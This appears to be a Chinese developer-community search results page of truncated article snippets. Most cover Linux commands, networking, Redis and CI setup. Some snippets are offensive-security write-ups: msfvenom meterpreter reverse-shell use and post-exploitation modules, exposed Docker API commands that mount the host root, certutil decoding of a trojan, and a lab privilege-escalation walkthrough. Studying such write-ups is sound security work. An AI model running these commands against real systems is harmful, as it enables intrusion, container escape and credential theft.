首页
学习
活动
专区
圈层
工具
发布
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Mdserver-web开源免费的VPS主机控制面板-类似宝塔面板后台管理操作

    在《AMH 国内开源免费云主机面板安装与使用》一文中,有朋友给我留言推荐了Mdserver-web,这是一个个人开发的VPS主机控制面板,开源免费。...试用了Mdserver-web后,发现Mdserver-web最大的特点就是后台的管理操作界面和宝塔面板后台基本一样,用起来会感觉很习惯。...安装与配置PHP 8.1和MySQL 8.0-Oneinstack建站新手教程一、Mdserver-web安装网站:https://github.com/midoks/mdserver-web进入VPS主机...使用Mdserver-web安装完成后生成的地址、账号和密码登录,以下就是Mdserver-web的后台管理面板了,跟宝塔面板基本上是一样了。...三、Mdserver-web建站3.1 绑定域名进入到Mdserver-web后台管理面板,添加网站,输入你的域名,记得提前将你的域名解析到服务器IP上。

    9K30

    Linux 指令通关指南:从“会敲命令”到“懂内核交互”,彻底掌握 Shell 与系统的对话艺术

    一、基础指令首尾与总结 1.1 文件压缩与远程传输指令 1.1.1 打包与解包:tar 基础使用 功能:打包/解包,不打开它,直接看内容 参数组合:(这里需要注意的是:-f 后面不能再加别的参数,-f...只能作为最后一个参数) tar -czf xxx.tgz xxx :打包并压缩 tar -xzf xxx.tgz :解压并解包(默认在当前路径下解压并解包) tar -xzf xxx.tgx -C...指定路径 :在指定路径下解压并解包,-C后面接指定的路径 -v:看到打包压缩或者解压解包的过程 将lesson5打包并压缩 [root@VM-0-16-centos 118]# tar -czf lesson5....tgz 压缩包拷贝到另一台Linux主机上 注意:这里需要知道另一台Linux主机的密码!!!...管理后台作业 │ │ 8.

    21010

    msfvenom木马生成及运用

    payload windows/meterpreter/reverse_tcp 设置一下需要的参数,端口和IP 直接run运行监听启动木马 成功上线 使用 background 命令可以将会话放置后台...可以重新载入会话1 可以输入shell转入目标机的cmd中 使用exit返回 使用help来查看有什么能控制他的 使用 screenshot 截图 background之后可以使用jobs查看后台的会话任务进程...run post/windows/gather/enum_applications 查看这台计算机安装了哪些应用 使用命令: run post/windows/gather/dumplinks 查看主机最近进行了哪些操作...查看所有网卡信息 使用: sniffer_start 2 选择网卡来监听 使用: sniffer_dump 2 2.cap 将捕获到的数据包保存到2.cap 然后可以用wires hark来打开 解包也可以直接通过模块来完成...使用: use auxiliary/sniffer/psnuffls set pcapfile /root/2.cap run 可以解包 开启远程链接 run post/windows

    1.7K30

    Linux:宏观搭建网络体系

    跨网段的主机的文件传输. 数据从一台计算机到另一台计算机传输过程中要经过一个或多个路由器. 7.2 封装和解包分用过程 每一层都会需要不同的协议报头!...——> 1、通信的过程,本质就是不断封装和解包的过程!! 2、封装过程中每层都要添加报头,报文=报头+有效载荷 3、解包的过程会不断丢弃报头,然后根据报头的信息进行分用并向上传递!!...那么封装、解包、分用又是具体如何做到的呢??...——>发送主机都要执行碰撞避免算法,他的算法原理就是每个主机在发送的时候都会等上随机的延迟时间,相当于是错峰发送!!...b主机,只不过需要跨网的时候会指定发给路由器 (2)路由器不仅有以太网的驱动、令牌环的驱动、无线wlan……的驱动,所以他会帮我们直接解包老的报头换上新的报头,这样底层的差异化就被屏蔽了,而上三层是保持一致的

    23100

    攻防演练-实战中的外网突破

    [] 登录OSS,发现大量所属目标单位的敏感信息 1.2、微信小程序接口未授权 1.2.1、微信小程序解包 想要对微信小程序进行解包操作,首先是要获取目标小程序的wxapkg文件。...但是Windows环境下的wxapkg文件中的js代码和资源文件一般是被加密的,需要使用专门设计的解密工具先进行解密,再进行解包操作,获取文件内容。iOS和Android平台下可直接进行解包操作。...可以利用脚本批量下载 2.2、疑似后门 通过镜像文件获取jar包,获取配置文件等敏感信息,对jar包的class文件进行反编译,进行代码审计获取到一个类似后门的漏洞,该接口只需要使用用户名,即可登录系统后台...#查看容器 docker -H tcp://:2375 ps -a #挂载宿主机的根目录到容器内的mnt目录 docker -H tcp://:2375 run -it...,普通权限 再次对公告发布人员猜解密码,成功登录后台,多了系统管理权限,直接添加用户赋予最高权限 新增用户登录,发现定时任务功能,直接使用定时任务执行命令 3.3、shiro 目标路径在被访问时,

    74620

    攻防演练-实战中的外网突破

    [] 登录OSS,发现大量所属目标单位的敏感信息 1.2、微信小程序接口未授权 1.2.1、微信小程序解包 想要对微信小程序进行解包操作,首先是要获取目标小程序的wxapkg文件。...但是Windows环境下的wxapkg文件中的js代码和资源文件一般是被加密的,需要使用专门设计的解密工具先进行解密,再进行解包操作,获取文件内容。iOS和Android平台下可直接进行解包操作。...可以利用脚本批量下载 2.2、疑似后门 通过镜像文件获取jar包,获取配置文件等敏感信息,对jar包的class文件进行反编译,进行代码审计获取到一个类似后门的漏洞,该接口只需要使用用户名,即可登录系统后台...#查看容器 docker -H tcp://:2375 ps -a #挂载宿主机的根目录到容器内的mnt目录 docker -H tcp://:2375 run -it...进行解码 certutil -decode 木马相对路径 解码后的木马相对路径 冰蝎上线并上线CS 3.2、若依二开 shiro的洞修复了,找到一个前台信息泄露漏洞 通过获取到的用户名,使用弱口令进入后台

    90530

    网络管理,NAT网络配置,修改主机名称,主机映射,防火墙,系统启动级别,用户和用户组,为用户配置sudoer权限,文件权限管理,打包和压缩

    2)Linux中配置Windows10的主机映射。 这样的话虚拟机既可以通过宿主机ip去访问宿主机,还可以通过域名win10去访问宿主机(需要我们自己配置)。..."开放80端口 ACCEPT表示接受,接受就是开放" iptables -I INPUT -p tcp --dport 80 -j ACCEPT 总结:以后所有的后台服务的状态查看...打包和解包 1)tar打包:打包后的后缀叫做tar。 注:打包会保留原文件,并生成一个打包文件。...语法:tar -cvf 打包名 文件列表 例如:tar -cvf a.tar aa.txt bb.txt 操作如下: 2)tar解包 注:解包后也会保留原打包文件。...语法:tar -xvf 打包名 例如:tar -xvf a_b.tar 注:先删除aa.txt和bb.txt原文件,再进行解包。 注:解包后并删除原打包文件。

    1K20

    Linux网络管理,NAT网络配置,修改主机名称,主机映射,防火墙,系统启动级别,用户和用户组,为用户配置sudoer权限,文件权限管理,打包和压缩

    2)Linux中配置Windows10的主机映射。 这样的话虚拟机既可以通过宿主机ip去访问宿主机,还可以通过域名win10去访问宿主机(需要我们自己配置)。..."开放80端口 ACCEPT表示接受,接受就是开放" iptables -I INPUT -p tcp --dport 80 -j ACCEPT 总结:以后所有的后台服务的状态查看...打包和解包 1)tar打包:打包后的后缀叫做tar。 注:打包会保留原文件,并生成一个打包文件。...语法:tar -cvf 打包名 文件列表 例如:tar -cvf a.tar aa.txt bb.txt 操作如下: 2)tar解包 注:解包后也会保留原打包文件。...语法:tar -xvf 打包名 例如:tar -xvf a_b.tar 注:先删除aa.txt和bb.txt原文件,再进行解包。 注:解包后并删除原打包文件。

    1K30

    万物互联的起点:走进 Linux 网络的心脏,开启一场从零开始的底层探索之旅

    因为每一层都有相应的协议,所以当我们进行上述的传输流程的时候,要进行封装和解包,左边发送消息的主机要对消息进行封装,右边接收消息的主机则要对信息进行解包。...通过上面的例子我们就对封装和解包有了一个初步的认识,那么下面我们就来看看这些层级之间是如何进行封装和解包的: 每一层进行封装的东西我们称为:报头,而被封装的内容我们称为:有效载荷。...经过上面封装的过程后,最终右边的主机拿到的就是被封装了很多层的信息,而它会从下往上进行解包,正是因为左边的主机是从上向下进行封装的,所以右边的主机从下往上进行解包时每一层对应的都是最外面的那层包装。...细节一: 我们不妨将封装和解包的过程竖着来看,左边是封装的顺序,而右边则是解包的过程,我们是否感觉这个顺序很熟悉呢? 没错,这种后进先出的特性不正是栈吗?...所以我们在上面的图中在右边的主机上写的是解包和分用的过程,那么分用是怎么完成的呢?

    12110

    攻防靶场(21):EMPIRE BREAKOUT

    帐号和密码都有了,现在就找登录框,进行密码喷洒攻击 10000端口是Webmin登录页,20000端口是Usermin登录页,最后就Usermin登录成功了 3.4 server权限 Usermin后台有服务器的命令执行环境...如果特权用户使用tar程序解包,解包后的文件属主将保持不变,原来是zabbix解包后还是zabbix 如果普通用户使用tar程序解包,解包后的文件属主将和普通用户一样,原来是root解包后就成了普通用户了...翻找服务器,发现一个/var/backups/.old_pass.bak文件,当前cyber用户没有read权限 先去一个有write权限的目录执行打包解包,比如/tmp/或/home/cyber/都行...相关命令是(下图黄色部分) 1、打包:/home/cyber/tar -cvf 1.tar /var/backups/.old_pass.bak 2、解包:/home/cyber/tar -xvf 1...攻击路径总结 公众号后台回复“20241025”获取该思维导图的.xmind格式源文件

    18610

    【Linux网络】初识网络,网络的基础概念

    假设现以太网中存在多个主机。 主机A想通过以太网将数据发送给主机E。发送的信息中包含了:发送主机mac地址与目标主机mac地址。...数据的封装、解包与分用 理解了局部网络的通信原理。我们再来看看在局部网络中,两个主机互发消息的原理。 如图。用户A与用户B想要通信,是依靠底层硬件:网卡来实现的。...通过局域网将信息传输给用户B的网卡,再向上一层层“解包”获取传递的信息。 详细过程如下: 每一层协议,都要对信息进行一层封装。解包也是在对应协议层一层一层的解开对应报头。...细节三: 我们通过观察报文一层层封装与解包的过程可以发现。封装时,报头一层层的封装在上层报文的前面;解包时,报头从最前面一层层解开。封装与解包的过程,就像是压栈与出栈!...通过路由器,在对应的局域网下寻找对应的主机(同一局域网下所有主机的 IP 地址第一个字节一定相同) 结合封装解包与mac地址,理解路由器重新解包和封装的过程。 详细步骤如下: 1.

    11010

    Redis之复制

    3.4.3、反客为主 SLAVEOF no one:使当前数据库停止与其他数据库的同步,转成主数据库 4、复制原理 Slave启动成功连接到master后会发送一个sync命令 Master接到命令启动后台的存盘进程...,同时收集所有接收到的用于修改数据集命令,在后台进程执行完毕之后,master将传送整个数据文件到slave,以完成一次完全同步 全量复制:而slave服务在接收到数据库文件数据后,将其存盘并加载到内存中...继续将新的所有收集到的修改命令依次传给slave,完成同步 但是只要是重新连接master,一次完全同步(全量复制)将被自动执行 5、哨兵模式(sentinel) 5.1、是什么 反客为主的自动版,能够后台监控主机是否故障...如果故障了根据投票数自动将从库转换为主库 5.2、怎么玩(使用步骤) 5.2.1、调整结构,6379带着80、81 5.2.2、自定义的/myredis目录下新建sentinel.conf文件,名字绝不能错...5.2.3、配置哨兵,填写内容 sentinel monitor 被监控数据库名字(自己起名字) 127.0.0.1 6379 1 上面最后一个数字1,表示主机挂掉后salve投票看让谁接替成为主机,

    29720

    一套初创公司的基础自动化部署搭建流程

    home/gitlab/logs:/var/log/gitlab \ -v /home/gitlab/data:/var/opt/gitlab \ gitlab/gitlab-ce 参数解释: -d:让容器后台运行...-p:暴露端口,把容器的443端口指向到宿主机443端口,宿主机8080->容器80,宿主机222->容器22 宿主机端口可以根据自己的情况自己定制 -name 给你的容器起个名,只要不和现有的重复就可以...\ -p 50000:50000 \ -v /home/jenkins/:/var/jenkins_home \ jenkins/jenkins 参数解释 -d:让容器后台运行...-p:暴露端口,宿主机8181->容器8080,宿主机50000->容器50000 -v 这就是挂载磁盘了,把宿主机的目录挂载到容器中,这么做哪怕是容器坏了我的内容也不会丢失。...then rm testv.tar.gz fi tar -zcvf test.tar.gz ./* 这里为什么要把项目打包呢,因为下面要配置的ssh不支持文件夹传输,所以需要先将内容进行打包然后去服务器进行解包

    1.6K30
    领券